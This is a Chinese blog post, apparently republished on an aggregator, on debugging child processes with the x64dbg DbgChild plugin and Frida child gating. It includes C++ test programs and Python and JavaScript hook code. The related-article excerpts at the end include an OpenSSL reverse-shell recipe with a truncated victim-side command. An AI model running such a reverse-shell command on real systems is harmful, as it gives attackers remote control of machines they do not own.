使用frida来spawn Fork 的子进程

news2024/12/23 20:09:35

索引

  • 需求
    • 测试程序
        • 父进程代码
        • 子进程代码
    • x64dbg
        • 插件功能
        • 开始调试
    • frida
    • 运行环境
        • 用到的文件和代码

需求

最近在学基础的Windows逆向知识,遇到个小问题。一个进程使用CreateProcessW创建的进程该如何在启动时附加,我想调试这个子进程启动时运行的函数。

谷歌搜索都给我翻烂了,最后发现还是得用英文搜。比如x64dbg attach child process就出现了这个结果: How to debug child process?

在测试完这个x64dbg插件之后,我想着frida有没有这样的功能,于是也搜索了一下frida hook muti process,也出现了一个方案,说是frida10就已经有了这个功能: Frida hook multiple processes

下面我简单说一下这两种的使用方法

测试程序

先用C++写一个简单的测试程序,用来创建子进程,代码很简单,直接调用CreateProcessW来启动一个子进程

父进程代码
#include <windows.h>
#include <iostream>
#include <stdio.h>


int main() {
	// 定义进程信息结构体
	PROCESS_INFORMATION pi;
	// 定义启动信息结构体
	STARTUPINFO si;
	// 初始化结构体
	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi, sizeof(pi));

	// Notepad 可执行文件的路径
	LPCWSTR notepadPath = L"SubProcess.exe";

	// 文件路径作为命令行参数
	LPWSTR cmdLine = NULL;

	DWORD currentProcessId = GetCurrentProcessId();

	// 创建新进程
	if (CreateProcessW(notepadPath, cmdLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
		printf("新进程已成功创建!\n");
		printf("新进程的进程ID:%d, 当前进程id: %d \n", pi.dwProcessId, currentProcessId);

		// 可以等待进程结束,或者继续执行其他操作
		// WaitForSingleObject(pi.hProcess, INFINITE);

		// 关闭进程和线程句柄
		CloseHandle(pi.hProcess);
		CloseHandle(pi.hThread);
	}
	else {
		printf("无法创建新进程。错误代码:%d", GetLastError());
	}
	int i = 0;
	
	while (true) {
		i += 1;
		printf("*************** 父进程id: %d, 第%d次等待 *******************\n", currentProcessId, i);
		Sleep(2000);
	}

	return 0;
}
子进程代码
#include <stdio.h>
#include <windows.h>

int main()
{
	int i = 0;
	DWORD currentProcessId = GetCurrentProcessId();
	while (true) {
		i += 1;
		printf("############### 子进程id: %d, 第%d次等待 ####################\n", currentProcessId, i);
		Sleep(3000);
	}
}

x64dbg

x64dbg是使用插件来附加子进程

插件地址:https://github.com/therealdreg/DbgChild

安装步骤:

  1. 先下载releases下面的文件DbgChild.Beta.10.zip
  2. 解压到x64dbg目录
  3. 打开x64dbg,插件里面就有DbgChild

解压后的目录结构
在这里插入图片描述
复制到x64dbg之后的目录结构
在这里插入图片描述

插件功能

我说一下我用的几个选项的含义
在这里插入图片描述

  1. 主动去触发hook进程创建
  2. 自动hook进程创建,一般选这个就行
  3. 取消hook NTDLL,我看演示的视频在启动子进程的时候都会主动点一次这个,不过下面有个自动取消hook默认是勾选的,我测试的时候不点这个也可以
  4. 启动监听程序,这个是必须的,且要在创建子进程之前启动
开始调试

勾选第二个选项并启动监听程序,使用x64dbg打开ForkProcess.exe,运行程序,这时候会有一个很长的等待,我开始以为是卡住了,后面发现它只是比较慢,要等个一分钟吧。用任务管理搜索其实SubProcess.exe已经启动了,不知道是哪里卡住了。

接着就会弹出一个新的x64dbg窗口,并且已经附加到了SubProcess了,
在这里插入图片描述
这里不清楚为啥子进程没有在入口断点断住,不过影响不大,因为x64dbg会记忆断点位置,我只需要现在打上断点,那么在下次启动的时候就会自动断下,比如这里在SubProcess的x64dbg程序里用Ctrl+G跳转到printf函数并且打上断点。重复上面的操作重新启动ForkProcess的时候,附加到SubProcess的x64dbg就会断在printf

如果在启动ForkProcess之后再想去附加SubProcess,printf的前几次就无法下断点了。

frida

根据上面搜索到的链接显示,frida10就已经支持这个功能了。不过现在已经frida16了,这里面的代码也不能用了,得看github的最新代码:https://github.com/frida/frida-python/blob/main/examples/child_gating.py

直接拷下来,稍微做点改动,代码比较长,为了方便讲js和Python代码分开

child_gating.py

import threading
import os
import frida
from frida_tools.application import Reactor




class Application:
    def __init__(self):
        self._stop_requested = threading.Event()
        self._reactor = Reactor(run_until_return=lambda reactor: self._stop_requested.wait())

        self._device = frida.get_local_device()
        self._sessions = set()

        self._device.on("child-added", lambda child: self._reactor.schedule(lambda: self._on_child_added(child)))
        self._device.on("child-removed", lambda child: self._reactor.schedule(lambda: self._on_child_removed(child)))
        self._device.on("output", lambda pid, fd, data: self._reactor.schedule(lambda: self._on_output(pid, fd, data)))

    def run(self):
        self._reactor.schedule(lambda: self._start())
        self._reactor.run()

    def _start(self):
        argv = [r"T:\Code\VisualStudio\ForkProcess\x64\Release\ForkProcess.exe"]
        env = {}
        print(f"✔ spawn(argv={argv})")
        pid = self._device.spawn(argv, env=env, stdio="pipe")
        self._instrument(pid)

    def _stop_if_idle(self):
        if len(self._sessions) == 0:
            self._stop_requested.set()

    def _instrument(self, pid):
        print(f"✔ attach(pid={pid})")
        session = self._device.attach(pid)
        session.on("detached", lambda reason: self._reactor.schedule(lambda: self._on_detached(pid, session, reason)))
        print("✔ enable_child_gating()")
        session.enable_child_gating()
        print("✔ create_script()")
        frida_js_code = self.read_jscode()
        script = session.create_script(frida_js_code)
        script.on("message", lambda message, data: self._reactor.schedule(lambda: self._on_message(pid, message)))
        print("✔ load()")
        script.load()
        print(f"✔ resume(pid={pid})")
        self._device.resume(pid)
        self._sessions.add(session)
    
    def read_jscode(self):
        path = os.path.dirname(os.path.abspath(__file__))
        file = os.path.join(path, "child_gating.js")
        with open(file, encoding='utf-8') as f:
            jscode = f.read()
        return jscode

    def _on_child_added(self, child):
        print(f"⚡ child_added: {child}")
        self._instrument(child.pid)

    def _on_child_removed(self, child):
        print(f"⚡ child_removed: {child}")

    def _on_output(self, pid, fd, data):
        pass
        #print(f"⚡ output: pid={pid}, fd={fd}, data={repr(data)}")

    def _on_detached(self, pid, session, reason):
        print(f"⚡ detached: pid={pid}, reason='{reason}'")
        self._sessions.remove(session)
        self._reactor.schedule(self._stop_if_idle, delay=0.5)

    def _on_message(self, pid, message):
        if message["type"] == "send":
            payload = message['payload']
            s = payload["format_str"] % tuple(payload["format_args"])
            print(f"⚡ message: pid={pid}, payload={s}")
        elif message["type"] == "error":
            print(f"⚡ message: pid={pid}, error: description={message['description']} stack={message['stack']}")
        else:
            print(f"⚡ message: pid={pid}, payload={message}")


app = Application()
app.run()

child_gating.js

// 根据%读取printf的参数
function vspritf(format_str, args){
    let printf_args = [];
    if (format_str.indexOf("%") === -1) {
        return printf_args;
    }
    var pos = 0;
    for (let index = 0; index < format_str.length; index++) {
        pos = format_str.indexOf("%", pos);
        if(pos == -1)
            break;
        var format_ch = format_str.substr(pos+1, 1);
        let length = printf_args.length;
        let arg;
        switch (format_ch) {
            case "s":
                arg = args[length+1].readAnsiString()
                break;
            case "d": 
                arg = args[length+1].toInt32()
                break;
            case "p":
                arg = args[length+1].toInt32()
                break;
            case "f":
                arg = args[length+1]
                break;
            default:
                arg = args[length+1]
                break;
        }
        printf_args.push(arg);
        pos += index+2;
    }
    return printf_args;
}

let ProcessModAddress = Process.findModuleByName('ForkProcess.exe');
// Offset是在x64dbg里计算的偏移,
// 本来我想使用Module.findExportByName(null, "printf"),发现得到的偏移不知道是哪里的
let Offset = '0x1070';
// 如果没有获取到ForkProcess,说明是子进程
if(!ProcessModAddress){
    ProcessModAddress = Process.findModuleByName('SubProcess.exe');
    Offset = '0x1010';
}
// 通过偏移计算printf的实际地址
let pvPrintf = ProcessModAddress.base.add(Offset);
// 调用Windows获取进程pid的api
let pvGetCurrentProcessId = Module.findExportByName("kernel32.dll", "GetCurrentProcessId")
var GetCurrentProcessId = new NativeFunction(pvGetCurrentProcessId, 'uint32', []);

console.log(GetCurrentProcessId(), Offset, pvPrintf)
// hook函数
Interceptor.attach(pvPrintf, {
    onEnter: function (args) {
        let format_str = args[0].readAnsiString()
        send({
            "format_str": format_str,
            "format_args": vspritf(format_str, args)
        })
    } 
});

运行结果如下:
在这里插入图片描述
这里我只测试了Windows,Linux和安卓应该也可以,官网给的例子是Linux的,安卓的话自行测试

运行环境

  • python==3.8.17
  • frida==16.1.2
  • frida-tools==12.1.3
  • vs2017
用到的文件和代码

https://github.com/kanadeblisst00/frida_child_gating

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1084661.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

你知道多号发圈的同时并延迟评论的方式吗?

你知道多号发圈的同时并延迟评论的方式吗&#xff1f; 其实很简单。 步骤1&#xff1a;编辑好朋友圈内容 步骤2&#xff1a;设置延迟评论 步骤3&#xff1a;选择多个号发圈 通过以上3个步骤&#xff0c;就可以实现多号发圈的同时并延迟评论。 在发布朋友圈前&#xff0c;只需要…

易点易动设备管理系统:打通采购管理的智能化设备管理解决方案

在现代企业的运营中&#xff0c;设备管理是一个关键的环节。传统的设备管理方法往往效率低下&#xff0c;导致设备故障频发、巡检和维修工作不协调&#xff0c;备件管理不规范。为了解决这些问题&#xff0c;我们引入了易点易动设备管理系统&#xff0c;它能够全面管理设备的生…

SAP内部转移价格(利润中心转移价格)的条件

SAP内部转移价格&#xff08;利润中心转移价格&#xff09; SAP内部转移价格&#xff08;利润中心转移价格&#xff09; SAP内部转移价格&#xff08;利润中心转移价格&#xff09;这个听了很多人说过&#xff0c;但是利润中心转移定价需要具备什么条件。没有找到具体的文档。…

取消加考!自考专业调整,2026年起执行新计划!

就在2023年10月7日&#xff0c;广东省教育考试院发布《关于广东省高等教育自学考试专业调整有关事项的通知》&#xff0c;自学考试迎来新变化&#xff0c;本次专业调整政策性强&#xff0c;涉及面广&#xff0c;持续时间长&#xff0c;一起来看看具体说明~ 关于广东省高等教育自…

定时任务cron,定时自动实现某段代码

定时任务表达式 组成&#xff1a;cron一般由6个空格和7个字符构成&#xff0c;七个字符按照顺序分别表示&#xff1a;秒 分 时 日 月 周 年&#xff1b;有时候“年”这个域也可以不写&#xff0c;甚至于在云函数的触发器中有这一位还会提示表达错误。 cron表达式规则&#xff1…

SpringMVC 域对象共享数据

文章目录 1、使用ServletAPI向request域对象共享数据2、使用ModelAndView向request域对象共享数据3、使用Model向request域对象共享数据4、使用map向request域对象共享数据5、使用ModelMap向request域对象共享数据6、Model、ModelMap、Map的关系7、向session域共享数据8、向app…

【编程必备知识】文件内容的读写

文章目录 前言1. 数据流2. Java IO 流3. InputStream 概述3.1 FileInputStream 概述3.1.1 代码示例 3.2 利用 Scanner 进行字符读取 4. OutputStream 概述4.1 利用 OutputStreamWriter 进行字符写入 总结 前言 书接上回, 本文继续讲解关于文件的知识, 上文讲了如何对文件系统进…

el-table合计行合并

效果如下 因为合计el-table的合并方法是不生效的,所以需要修改css下手 watch: {// 应急物资的合计合并planData: {immediate: true,handler() {setTimeout(() > {const tds document.querySelectorAll(".pro_table .el-table__footer-wrapper tr>td");tds[0]…

第二章 物理层 | 计算机网络(谢希仁 第八版)

文章目录 第二章 物理层2.1 物理层的基本概念2.2 数据通信的基础知识2.2.1 数据通信系统的模型2.2.2 有关信道的几个基本概念2.2.3 信道的极限容量 2.3 物理层下面的传输媒体2.3.1 导引型传输媒体2.3.2 非导引型传输媒体 2.4 信道复用技术2.4.1 频分复用、时分复用和统计时分复…

智能井盖传感器:数智赋能让城市管理更智慧

智能井盖传感器&#xff1a;数智赋能让城市管理更智慧 在城市化快速发展的今天&#xff0c;保护和增强城市基础设施生命线的需求至关重要。而井盖作为守护城市地下空间的安全门&#xff0c;其智能化管理与城市生命线安全工程建设息息相关。在这篇文章中将为大家详细介绍智能井…

2023年中国MarTech服务商行业发展规模及趋势分析:逐渐呈现出场景化、行业化、定制化[图]

不同赛道的市场集中度及商业模式不同&#xff0c;因此对应各细分场景的MarTech技术应用深度存在较大差异。整体来看&#xff0c;市场竞争情况激烈、产品迭代周期较快、用户互动频繁的行业在数据&策略场景、渠道运营&转化场景与客户流程&管理场景对技术的完善性及功…

漏洞复现--鸿运主动安全监控云平台任意文件下载

免责声明&#xff1a; **文章中涉及的漏洞均已修复&#xff0c;敏感信息均已做打码处理&#xff0c;文章仅做经验分享用途&#xff0c;切勿当真&#xff0c;未授权的攻击属于非法行为&#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何…

想要查看员工与客户聊天记录和跟进情况,有什么工具推荐吗?

想要查看员工与客户聊天记录和每天新增客户&#xff0c;可以使用微信管理系统这个工具。 微信管理系统是一个能够同时登录多个微信&#xff0c;实现一个人管理多个微信的工具。它分为两大版块&#xff0c;一个是营销&#xff0c;一个是监管。 而监管是企业用于监管员工微信较多…

统一机器人描述格式——URDF

URDF&#xff08;Unified Robot Description Format&#xff0c;统一机器人描述格式&#xff09;是ROS中一个非常重要的机器人模型描述格式&#xff0c;ROS同时也提供URDF文件的C解析器&#xff0c;可以解析URDF文件中使用XML格式描述的机器人模型。 在使用URDF文件构建机器人模…

【算法|滑动窗口No.1】leetcode209. 长度最小的子数组

个人主页&#xff1a;兜里有颗棉花糖 欢迎 点赞&#x1f44d; 收藏✨ 留言✉ 加关注&#x1f493;本文由 兜里有颗棉花糖 原创 收录于专栏【手撕算法系列专栏】【LeetCode】 &#x1f354;本专栏旨在提高自己算法能力的同时&#xff0c;记录一下自己的学习过程&#xff0c;希望…

基于SSM的医院住院管理系统的设计与实现

末尾获取源码 开发语言&#xff1a;Java Java开发工具&#xff1a;JDK1.8 后端框架&#xff1a;SSM 前端&#xff1a;采用JSP技术开发 数据库&#xff1a;MySQL5.7和Navicat管理工具结合 服务器&#xff1a;Tomcat8.5 开发软件&#xff1a;IDEA / Eclipse 是否Maven项目&#x…

物业管理智慧小区活动报名小程序开发

小程序基于UniApp开发&#xff0c;用于智慧小区物业管理&#xff0c;核心功能为业主报修、业主活动报名、房产车位管理、物业费缴费管理、线上商城等功能。 小程序深度调研物业工作场景开发而出&#xff0c;可以有效提高物业费的收缴率和帮助物业节约成本提高运营效率和提升额…

nvm、node、npm解决问题过程记录

在Windows10如何降级Node.js版本&#xff1a;可以尝试将Node.js版本降级到一个较旧的版本&#xff0c;以查看问题是否得以解决。可以使用Node Version Manager (nvm) 来轻松切换Node.js版本&#xff0c;具体完整步骤&#xff1a; 首先&#xff0c;需要安装Node Version Manager…

力扣第236题 二叉树的最近公共祖先 c++ 递归和回溯 附注释和简短代码

题目 236. 二叉树的最近公共祖先 中等 相关标签 树 深度优先搜索 二叉树 给定一个二叉树, 找到该树中两个指定节点的最近公共祖先。 百度百科中最近公共祖先的定义为&#xff1a;“对于有根树 T 的两个节点 p、q&#xff0c;最近公共祖先表示为一个节点 x&#xff0c…

使用OpenSSL的反弹shell

1、攻击机生成证书&#xff1a; openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes2、攻击机开启服务 openssl s_server -quiet -key key.pem -cert cert.pem -port 803、靶机连接命令 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1…